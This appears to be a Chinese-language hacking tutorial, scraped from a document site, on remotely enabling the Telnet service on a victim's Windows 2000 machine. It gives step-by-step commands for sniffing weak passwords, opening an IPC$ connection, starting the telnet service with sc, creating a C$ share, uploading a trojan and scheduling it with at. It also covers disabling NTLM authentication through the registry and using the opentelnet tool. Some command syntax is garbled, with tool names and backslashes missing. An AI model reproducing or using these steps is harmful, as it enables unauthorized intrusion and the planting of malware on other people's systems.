2024年3月13日发(作者:)

远程开启对方telnet服务-SKING

1 首先用流光嗅探得到对方密码,主要是弱口令,强壮密码需要一个很好的密码字典和

机器性能以及网络速度以及耐心和运气,呵呵。

2 用net use命令建立ipc$连接 例如:net use ipipc$ "" /user:administrator

3 用sc命令把禁用的telnet服务变成自动 sc ip config tlntsvr start= auto

4 用sc命令将telnet启动 sc ip start tlntsvr

5 telnet登录 telnet ip

6 net share 建立c$共享 net share sharename=drive:path

7 copy命令上传木马 copy ipc$

8 at命令定时执行 at ip time cmd

注意:如果对方采用了NTLM认证策略,可以连接网络注册表修改

HKEYLOCAL MACHINESOFTWAREMICROSOFTTELNETSERVER1.0下的NTLM

键值由2改为0。

然后重新启动telnet服务。

有些朋友喜欢使用opentelnet远程开启telnet,其实道理一样,关键的问题还是要

在之前获得帐户和密码。

是用来启动远程服务器的Telnet的工具软件,是一个黑客工具,很多

网站有下载。

的用法:

server <帐号> <密码>

比如下面的:(命令意思是连接192.168.1.2,帐号administrator,密码123456 ,

0表示不使用NTLM认证方式,

Telnet的端口是90)

C:> ip administrator 123456 0 90

当程序运行后得到:

BINGLE!!!Yeah!!

Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

Successfully!

就说明Telnet服务启动成功,并且使用的端口是90。这样,我们就能够得到一个开

90端口的Windows 2000